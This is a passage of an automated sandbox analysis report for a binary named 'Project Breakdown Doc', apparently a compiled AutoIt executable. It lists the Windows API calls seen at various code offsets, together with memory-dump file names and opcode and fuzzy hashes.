                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: 0aae98e4d95f048cdc85beb82ce42f6e5f403cc518c0b95143bdccac1f93404c
                                                  • Instruction ID: 8851471869e7fef4ecadcdf22df50c25c2ea4c9b9affb643cddfc8710a96b0c7
                                                  • Opcode Fuzzy Hash: 0aae98e4d95f048cdc85beb82ce42f6e5f403cc518c0b95143bdccac1f93404c
                                                  • Instruction Fuzzy Hash: 76E03932100244EEDB215F64FC49BDC3B21EB05332F04836AFA79880E187B14A81DB11
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00C98C63
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C9882E), ref: 00C98C6A
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C9882E), ref: 00C98C77
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C9882E), ref: 00C98C7E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: e7b83911673460bb12994dc54d938f40491182ad694b7be19de35ec0f4ac145e
                                                  • Instruction ID: d77fa00c1ab33e06f2ceb6ad3125f7eff48cd2f444d41fb858ba00a6a033b70b
                                                  • Opcode Fuzzy Hash: e7b83911673460bb12994dc54d938f40491182ad694b7be19de35ec0f4ac145e
                                                  • Instruction Fuzzy Hash: 3FE08676642211EBDB205FB0ED0CF5E3BADEF51B92F08486CF645CA050DA74844ACB61
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00C82187
                                                  • GetDC.USER32(00000000), ref: 00C82191
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C821B1
                                                  • ReleaseDC.USER32(?), ref: 00C821D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 004282307b3167a579caaaddd0e28bcd7365b7800b197df56fa2a2b88c6d6d33
                                                  • Instruction ID: fb2603d938a0ee1b9e6a222efb4044cc8aa863c821a01234a38ab78f9e6fef09
                                                  • Opcode Fuzzy Hash: 004282307b3167a579caaaddd0e28bcd7365b7800b197df56fa2a2b88c6d6d33
                                                  • Instruction Fuzzy Hash: 27E0E5B5800214EFDB019F61C808B9D7BB2FB4C350F108429F95A97260CB389542AF40
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00C8219B
                                                  • GetDC.USER32(00000000), ref: 00C821A5
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C821B1
                                                  • ReleaseDC.USER32(?), ref: 00C821D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: dfc65f9c1bf504e4a4eb9f06f118ebe62d3d624a267cf39398334c30435c4093
                                                  • Instruction ID: f1184e2918428f25bde5a5f9a803adeb4ce6c07e6e2b17edf4b752d55d5c8f23
                                                  • Opcode Fuzzy Hash: dfc65f9c1bf504e4a4eb9f06f118ebe62d3d624a267cf39398334c30435c4093
                                                  • Instruction Fuzzy Hash: FCE012B5800204AFCB019FB0C808B9EBFF2FB4C310F108029F95AA7320CB389142AF40
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00C9B981
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: 74204454cacb7933dffe54e05bbe99d41556198503907c35ac1fab2a6cb0f8c4
                                                  • Instruction ID: f9ba1e7f048687dbc7fa42476bcbe5c59ec753f0f2246c7d28e6e094e62ace8e
                                                  • Opcode Fuzzy Hash: 74204454cacb7933dffe54e05bbe99d41556198503907c35ac1fab2a6cb0f8c4
                                                  • Instruction Fuzzy Hash: DE913970600601AFDB64DF68D988B6ABBE9FF48710F24856EF9498B291DB70ED40CB50
                                                  APIs
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • __wcsnicmp.LIBCMT ref: 00CAB298
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CAB361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: f52b86de616c720b6c8e986338a82c5f625fd2be54c27eba4e33c87681bc932f
                                                  • Instruction ID: 0bc4c4c716f347b649a504c16ac7ca0a0b8572adc315b6cddf656775e4bf969c
                                                  • Opcode Fuzzy Hash: f52b86de616c720b6c8e986338a82c5f625fd2be54c27eba4e33c87681bc932f
                                                  • Instruction Fuzzy Hash: 4C61A175A00216AFCF14DF94C885EAEB7B4FF09314F14416AF916AB3A2DB70AE40DB50
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00C52AC8
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C52AE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: 576a6015f07bbb8400f72194e3ee3e2daff1d9347ad287ae3cda24e9e13e61b1
                                                  • Instruction ID: a7c38602842b46489a63804752af3fb12f951a88e3437b91ff09c2b925aa8599
                                                  • Opcode Fuzzy Hash: 576a6015f07bbb8400f72194e3ee3e2daff1d9347ad287ae3cda24e9e13e61b1
                                                  • Instruction Fuzzy Hash: 91514672418B549BD320AF10DC86BAFBBE8FF88310F42885DF1D9411A1DB308569DB27
                                                  APIs
                                                    • Part of subcall function 00C4506B: __fread_nolock.LIBCMT ref: 00C45089
                                                  • _wcscmp.LIBCMT ref: 00CA9AAE
                                                  • _wcscmp.LIBCMT ref: 00CA9AC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 428f84898bd5156399e014c63cad5dad05d39ffdaee14588f22c12c15b91b3c3
                                                  • Instruction ID: aeb97ac22a55bd0dd41ddf888520adde091d8685e01eae036dc574573d4cc2f1
                                                  • Opcode Fuzzy Hash: 428f84898bd5156399e014c63cad5dad05d39ffdaee14588f22c12c15b91b3c3
                                                  • Instruction Fuzzy Hash: B041D775A0061ABBDF209AA4DC86FEFB7BDEF46714F000079F904A71C1DA759A0497A1
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CB2892
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CB28C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: a0f89ac27aabb8c1155deffdd442dbc3bd456b09ecd1620e8ef5792685a1abdb
                                                  • Instruction ID: 4c89d59573d35369eb7c3f1bd3ccf058deb6de6c541f4a963eb515d08c7c81e0
                                                  • Opcode Fuzzy Hash: a0f89ac27aabb8c1155deffdd442dbc3bd456b09ecd1620e8ef5792685a1abdb
                                                  • Instruction Fuzzy Hash: C4310A71800219AFCF119FA1DC85EEEBFB9FF08350F104169F815A6166DB315A56DBA0
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00CC6D86
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CC6DC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 243e48cf3ec5a4f982f1828559da4a73763e0705c4b259c65c2f24c6caed100f
                                                  • Instruction ID: 40bfd002d043c8051ddd953fb0f2ee554a5da3652fe6174f9310bd39d1af5099
                                                  • Opcode Fuzzy Hash: 243e48cf3ec5a4f982f1828559da4a73763e0705c4b259c65c2f24c6caed100f
                                                  • Instruction Fuzzy Hash: 0F317C71200604AADB109F68CC81FFB77A9FF48724F10861DF9AA97190DA31AD92DB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2E00
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CA2E3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: e8448dcdfa873e59a2e003fbade2a09bbcb5ff864a7fcaa54b8e7f6a591fa448
                                                  • Instruction ID: 0151a88146c2338225b07f270e6e931ebb4ac776c42826f853134148651aa01d
                                                  • Opcode Fuzzy Hash: e8448dcdfa873e59a2e003fbade2a09bbcb5ff864a7fcaa54b8e7f6a591fa448
                                                  • Instruction Fuzzy Hash: D8310931A00326ABEB248F8CC885B9EBBB5FF06309F140029E995D62A0D7709A80DB50
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CC69D0
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC69DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 53b4ad224443d626c59537097a409b4817f7f6e1159338604a374ee3f5c50645
                                                  • Instruction ID: 4782a04326c1e012bfdbe8807de334dfcccc581e14023c2f9e51aafc47015681
                                                  • Opcode Fuzzy Hash: 53b4ad224443d626c59537097a409b4817f7f6e1159338604a374ee3f5c50645
                                                  • Instruction Fuzzy Hash: F111C4717002086FEF119F24CD80FBF776EEB893A4F110129F96897290D6719D9187A0
                                                  APIs
                                                    • Part of subcall function 00C41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C41D73
                                                    • Part of subcall function 00C41D35: GetStockObject.GDI32(00000011), ref: 00C41D87
                                                    • Part of subcall function 00C41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C41D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00CC6EE0
                                                  • GetSysColor.USER32(00000012), ref: 00CC6EFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: c7918c8f76c40d70e080525f8797d222d3bc5a9dfbc2e9f0dc5909b0279d2a29
                                                  • Instruction ID: 4197398350d28cb3ab47faa5f331d337ba9cc94db1410a632e7a937f8b6618de
                                                  • Opcode Fuzzy Hash: c7918c8f76c40d70e080525f8797d222d3bc5a9dfbc2e9f0dc5909b0279d2a29
                                                  • Instruction Fuzzy Hash: C821E472A1020AAFDB04DFA8DD45FEA7BA9FB08314F04462DF955D2250E635E8619B60
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00CC6C11
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CC6C20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: eef1c89b02bc4dde7c53f473ceee68ec66a0915f28fb973c98ad42103b731dd7
                                                  • Instruction ID: 8db80831c8a4981f4a3bb24c6d7d5d270c44509e4015237b6081de27b8099e06
                                                  • Opcode Fuzzy Hash: eef1c89b02bc4dde7c53f473ceee68ec66a0915f28fb973c98ad42103b731dd7
                                                  • Instruction Fuzzy Hash: 44116671500208ABEB108F64DE91FEA3BAAEB04378F204728F975D71E0C775DC91AB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2F11
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CA2F30
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 75541cad306a02e29fcc4a217dbe5dfc95306a552f66ff67ebb40526de51a539
                                                  • Instruction ID: a420f0b4d5af1c9bc2db293bc81c201e2be0c6b601abecf3b112339647b5ffa3
                                                  • Opcode Fuzzy Hash: 75541cad306a02e29fcc4a217dbe5dfc95306a552f66ff67ebb40526de51a539
                                                  • Instruction Fuzzy Hash: D311B635905236AFDB20DB9CDC44B9977B9EB06318F1840A5E864E72A0D7B0EE04C7A5
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CB2520
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CB2549
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: 3161dd765754b0c68cd2b75324f77250ef17888ced87b70ddd096d39278b4897
                                                  • Instruction ID: 08e5c17ac6637fa53781a2ba976651ce8f138e076b36c3c497c1c0b934510ab2
                                                  • Opcode Fuzzy Hash: 3161dd765754b0c68cd2b75324f77250ef17888ced87b70ddd096d39278b4897
                                                  • Instruction Fuzzy Hash: EF11A0B0541225BADB349F528C99FFBFF68FB06751F10822AF91556040D2706A59DAE0
                                                  APIs
                                                    • Part of subcall function 00CB830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00CB80C8,?,00000000,?,?), ref: 00CB8322
                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB80CB
                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00CB8108
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 2496851823-2422070025
                                                  • Opcode ID: 529adb535c8ba72e9d86985f4703c8c12064139f76d73204af54801ac3f23704
                                                  • Instruction ID: d0e028635687b962f1075ea85fa34d96d67898e796c080922b4b09cda714bd17
                                                  • Opcode Fuzzy Hash: 529adb535c8ba72e9d86985f4703c8c12064139f76d73204af54801ac3f23704
                                                  • Instruction Fuzzy Hash: AF11A574500205ABDF10AF64DC46FFDB379FF04360F10852AE911972D1DB71A915D795
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C99355
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: aaadeafa3cb91df2dcc1b2244107872e155f8621c17fedc9e4bd7cc584576c6b
                                                  • Instruction ID: 419e47faf20c6bf2a09eb1519e39dc03b90c31470c436b39449daace24695472
                                                  • Opcode Fuzzy Hash: aaadeafa3cb91df2dcc1b2244107872e155f8621c17fedc9e4bd7cc584576c6b
                                                  • Instruction Fuzzy Hash: 9E019E71A05218AB8F04EFA4CC969FE7769FF06320B14071DF972572E2DB31690CA751
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
